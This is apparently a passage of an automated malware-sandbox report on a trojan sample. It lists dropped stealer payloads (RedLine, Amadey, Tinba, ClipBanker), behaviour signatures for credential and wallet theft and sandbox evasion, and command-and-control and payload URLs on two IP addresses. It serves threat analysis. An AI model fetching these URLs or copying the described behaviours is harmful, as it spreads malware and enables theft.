29->139 141 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 29->141 149 2 other signatures 29->149 50 rundll32.exe 29->50         started        process9 dnsIp10 123 185.81.68.147, 1912, 49704, 49705 KLNOPT-ASFI Finland 31->123 89 C:\Users\user\AppData\...C2F.tmp.gfx.exe, PE32 31->89 dropped 91 C:\Users\user\AppData\...24B.tmp.update.exe, PE32+ 31->91 dropped 93 C:\Users\user\AppData\...\D7AB.tmp.ssg.exe, PE32 31->93 dropped 95 C:\Users\user\AppData\...\CC11.tmp.ctx.exe, PE32+ 31->95 dropped 151 Benign windows process drops PE files 31->151 153 Contains functionality to start a terminal service 31->153 155 Found many strings related to Crypto-Wallets (likely being stolen) 31->155 157 Contains functionality to inject threads in other processes 31->157 52 CC11.tmp.ctx.exe 52 31->52         started        56 1DC30FADAFF92643095942.exe 3 31->56         started        58 1DC30FADAFF92643095942.exe 3 31->58         started        68 2 other processes 31->68 159 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 36->159 161 Tries to steal Instant Messenger accounts or passwords 48->161 163 Tries to harvest and steal ftp login credentials 48->163 165 Tries to harvest and steal browser information (history, passwords, etc) 48->165 60 powershell.exe 48->60         started        62 netsh.exe 48->62         started        167 Uses netsh to modify the Windows network and firewall settings 50->167 169 Tries to harvest and steal WLAN passwords 50->169 64 powershell.exe 50->64         started        66 netsh.exe 50->66         started        file11 signatures12 process13 file14 97 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 52->97 dropped 99 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 52->99 dropped 101 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 52->101 dropped 107 47 other files (7 malicious) 52->107 dropped 181 Multi AV Scanner detection for dropped file 52->181 183 Machine Learning detection for dropped file 52->183 70 CC11.tmp.ctx.exe 52->70         started        185 Found evasive API chain (may stop execution after checking mutex) 56->185 187 Found API chain indicative of debugger detection 56->187 189 Contains functionality to inject threads in other processes 56->189 203 2 other signatures 56->203 72 svchost.exe 56->72         started        85 2 other processes 56->85 205 4 other signatures 58->205 87 3 other processes 58->87 103 C:\Users\user\...\246122658369_Desktop.zip, Zip 60->103 dropped 191 Found many strings related to Crypto-Wallets (likely being stolen) 60->191 193 Loading BitLocker PowerShell Module 60->193 74 conhost.exe 60->74         started        76 conhost.exe 62->76         started        78 conhost.exe 64->78         started        80 conhost.exe 66->80         started        105 C:\Users\user\AppData\Local\...behaviorgraphxtuum.exe, PE32 68->105 dropped 195 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 68->195 197 Contains functionality to start a terminal service 68->197 199 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 68->199 201 Tries to steal Crypto Currency Wallets 68->201 82 Gxtuum.exe 68->82         started        signatures15 process16 signatures17 179 Contains functionality to start a terminal service 82->179

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              yINR7uQlPr.exe40%VirustotalBrowse
                              yINR7uQlPr.exe75%ReversingLabsWin64.Trojan.Midie
                              yINR7uQlPr.exe100%Joe Sandbox ML
                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Temp\10000820101\update.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\E24B.tmp.update.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\10000820101\update.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\update[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\update[1].exe58%ReversingLabsWin64.Trojan.Midie
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll47%ReversingLabsWin32.Trojan.Amadey
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe88%ReversingLabsByteCode-MSIL.Trojan.RedLineStealz
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll34%ReversingLabsWin64.Infostealer.Tinba
                              C:\Users\user\AppData\Local\Temp\10000820101\update.exe58%ReversingLabsWin64.Trojan.Midie
                              C:\Users\user\AppData\Local\Temp\10000830101\update.exe58%ReversingLabsWin64.Trojan.Midie
                              C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe88%ReversingLabsByteCode-MSIL.Trojan.RedLineStealz
                              C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe29%ReversingLabsWin64.Infostealer.ClipBanker
                              C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe88%ReversingLabsByteCode-MSIL.Trojan.RedLineStealz
                              C:\Users\user\AppData\Local\Temp\E24B.tmp.update.exe58%ReversingLabsWin64.Trojan.Midie
                              C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe63%ReversingLabsWin32.Infostealer.Tinba
                              C:\Users\user\AppData\Local\Temp\_MEI71402\VCRUNTIME140.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\_bz2.pyd0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\_ctypes.pyd0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\_hashlib.pyd0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\_lzma.pyd0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\_socket.pyd0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\libcrypto-1_1.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\libffi-7.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\python38.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\select.pyd0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\_MEI71402\ucrtbase.dll0%ReversingLabs
                              No Antivirus matches
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              http://185.81.68.147/7vhfjke3/index.php80%Avira URL Cloudsafe
                              http://185.81.68.147/7vhfjke3/index.php$0%Avira URL Cloudsafe
                              http://185.81.68.147/7vhfjke3/index.php60%Avira URL Cloudsafe
                              http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1100%Avira URL Cloudmalware
                              http://185.81.68.147/7vhfjke3/index.php#100%Avira URL Cloudmalware
                              http://185.81.68.147/7vhfjke3/index.php:0%Avira URL Cloudsafe
                              http://185.81.68.147/7vhfjke3/index.phpo/0%Avira URL Cloudsafe
                              http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=14%VirustotalBrowse
                              http://185.81.68.147/7vhfjke3/Plugins/cred64.dll0%Avira URL Cloudsafe
                              http://185.81.68.147/7vhfjke3/index.php611%VirustotalBrowse
                              http://185.81.68.148/8Fvu5jh4DbS/index.phpoded0%Avira URL Cloudsafe
                              http://185.81.68.148/8Fvu5jh4DbS/index.phpt0%Avira URL Cloudsafe
                              http://185.81.68.148/8Fvu5jh4DbS/index.phpx0%Avira URL Cloudsafe
                              http://185.81.68.148/8Fvu5jh4DbS/index.phpu0%Avira URL Cloudsafe
                              http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rns100%Avira URL Cloudmalware
                              http://185.81.68.147/7vhfjke3/index.php?)100%Avira URL Cloudmalware
                              http://185.81.68.147/7vhfjke3/index.php?(100%Avira URL Cloudmalware
                              http://185.81.68.148/8Fvu5jh4DbS/index.phpB/0%Avira URL Cloudsafe
                              http://crl.micE0%Avira URL Cloudsafe
                              http://185.81.68.147/7vhfjke3/Plugins/clip64.dllb0%Avira URL Cloudsafe
                              http://185.81.68.147/7vhfjke3/index.phpq00%Avira URL Cloudsafe
                              http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1Q100%Avira URL Cloudmalware
                              http://185.81.68.147/7vhfjke3/index.php_(0%Avira URL Cloudsafe
                              http://185.81.68.148/Fvu5jh4DbS/index.php0%Avira URL Cloudsafe
                              http://185.81.68.147/7vhfjke3/Plugins/cred64.dll$0%Avira URL Cloudsafe
                              http://185.81.68.147/gfx.exe100%Avira URL Cloudmalware
                              http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1g100%Avira URL Cloudmalware
                              http://185.81.68.147/7vhfjke3/index.php?scr=1100%Avira URL Cloudmalware
                              http://185.81.68.148/8Fvu5jh4DbS/index.phpodedu0%Avira URL Cloudsafe
                              http://185.81.68.147/7vhfjke3/Plugins/clip64.dll0%Avira URL Cloudsafe
                              http://185.81.68.147/7vhfjke3/index.php.00%Avira URL Cloudsafe
                              https://word.office.comon0%Avira URL Cloudsafe
                              http://185.81.68.148/a0%Avira URL Cloudsafe
                              https://go.t.com/fwlink/?Li9550%Avira URL Cloudsafe
                              http://185.81.68.148/8Fvu5jh4DbS/index.php)0%Avira URL Cloudsafe
                              http://185.81.68.147/7vhfjke3/index.phpR00%Avira URL Cloudsafe
                              http://185.81.68.147/VzCAHn.php?1DC30FADAFF926430959420%Avira URL Cloudsafe
                              No contacted domains info
                              NameMaliciousAntivirus DetectionReputation
                              http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1true
                              • 4%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              unknown
                              http://185.81.68.147/gfx.exetrue
                              • Avira URL Cloud: malware
                              unknown
                              http://185.81.68.147/7vhfjke3/index.php?scr=1true
                              • Avira URL Cloud: malware
                              unknown
                              http://185.81.68.147/VzCAHn.php?1DC30FADAFF92643095942true
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/02/sc/sctD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://185.81.68.147/7vhfjke3/index.php#rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://185.81.68.147/7vhfjke3/index.php$Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://schemas.datacontract.orgD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://tempuri.org/Entity/Id23ResponseDD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/Entity/Id12ResponseD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://tempuri.org/D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://tempuri.org/Entity/Id2ResponseD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://tempuri.org/Entity/Id21ResponseD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#CC11.tmp.ctx.exe, 00000010.00000003.2261352417.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260462674.00000204B78A7000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260261857.00000204B7840000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2265985623.00000204B78A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://185.81.68.147/7vhfjke3/index.php6rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • 11%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://tempuri.org/Entity/Id6ResponseDD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://185.81.68.147/7vhfjke3/index.php8rundll32.exe, 00000018.00000002.2689505871.000001C0C6BDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://185.81.68.147/7vhfjke3/index.php:rundll32.exe, 0000001D.00000002.3377277785.00000000032C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://185.81.68.147/7vhfjke3/index.phpo/Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://185.81.68.147/7vhfjke3/Plugins/cred64.dllGxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://185.81.68.148/8Fvu5jh4DbS/index.phpodedGxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000014.00000002.3380715534.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://tempuri.org/Entity/Id13ResponseDD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002AB6000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.0000000003987000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://nuget.org/nuget.exepowershell.exe, 0000001F.00000002.2524411157.000002E53780A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2586089026.000002E545FB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021992388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2584503281.00000219A0A40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/faultD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://185.81.68.148/8Fvu5jh4DbS/index.phptGxtuum.exe, 00000014.00000002.3384934362.0000000003AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsatD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/Entity/Id15ResponseD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://185.81.68.148/8Fvu5jh4DbS/index.phpxGxtuum.exe, 00000014.00000002.3384934362.0000000003AC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://185.81.68.148/8Fvu5jh4DbS/index.phpurundll32.exe, 00000018.00000002.2689505871.000001C0C6B48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2524411157.000002E535F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.00000219909D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rnsrundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.2066603654.000000000C860000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3104194293.000000000C860000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://api.ip.sb/ipexplorer.exe, 00000004.00000003.2262245343.000000000AA52000.00000004.00000001.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000000.2265531996.00000000005C2000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                                        high
                                                                                        http://185.81.68.147/7vhfjke3/index.php?)Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        http://185.81.68.147/7vhfjke3/index.php?(Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://tempuri.org/Entity/Id1ResponseDD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://185.81.68.148/8Fvu5jh4DbS/index.phpB/rundll32.exe, 0000001E.00000002.3378440733.00000000033DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerCC11.tmp.ctx.exe, 00000010.00000003.2261352417.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260462674.00000204B78A7000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260261857.00000204B7840000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2265985623.00000204B78A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://contoso.com/Iconpowershell.exe, 00000020.00000002.2584503281.00000219A0A40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.micECC11.tmp.ctx.exe, 0000000B.00000003.2239182239.0000023FC7270000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.datacontract.org/2004/07/System.ServiceModelD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002A8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://tempuri.org/Entity/Id24ResponseD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://185.81.68.147/7vhfjke3/Plugins/clip64.dllbGxtuum.exe, 00000014.00000002.3380715534.0000000000DAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://185.81.68.147/7vhfjke3/index.phpq0Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1Qrundll32.exe, 00000016.00000002.2680605134.000001ED586C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                http://tempuri.org/Entity/Id21ResponseDD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, ssg.exe, 0000002C.00000002.3006898229.00000000035D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://185.81.68.147/7vhfjke3/index.php_(Gxtuum.exe, 00000014.00000002.3380715534.0000000000E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressingD7AB.tmp.ssg.exe, 00000011.00000002.2585861729.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
